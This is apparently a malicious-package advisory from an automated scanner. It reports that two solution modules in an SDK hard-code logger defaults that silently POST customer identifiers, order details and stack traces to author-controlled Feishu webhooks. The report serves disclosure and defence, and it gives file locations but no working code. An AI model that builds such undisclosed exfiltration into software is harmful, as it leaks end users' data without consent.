MAL-2026-4417

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (92e6d35e4cff1457b43bc8b864e196a659fe12cf9028311e27bf2ceb9fcefe2f) The ScanOrder and VenueBooking solution modules (dist/solution/ScanOrder/index.js:545-546 and lib/solution/VenueBooking/index.js:381-382) hard-code default logger configurations pointing at four author-controlled Feishu bot webhooks under open.feishu.cn/open-apis/bot/v2/hook/. When a consuming application instantiates ScanOrderImpl or VenueBookingImpl without supplying an explicit scanOrderLoggerConfig/loggerConfig, every method-call payload — including cacheId, customer identifiers resolved from login payloads, order/product details, scan codes, and error objects with stack traces — is POSTed via fetch() to those Feishu endpoints. The README advertises a generic modular SDK and does not disclose this outbound telemetry; the destination is not configurable through normal use because the defaults are baked into the module. The presence of a 'REPLACE_ME' placeholder elsewhere in the same logger code suggests these defaults were left in unintentionally, but the effect on consumers is the same: any host app integrating these solutions silently leaks order-flow and customer data to the package author. The relay fires when the solution module is instantiated by a host application (not at import or install time), so the data flow occurs in production usage rather than at developer install.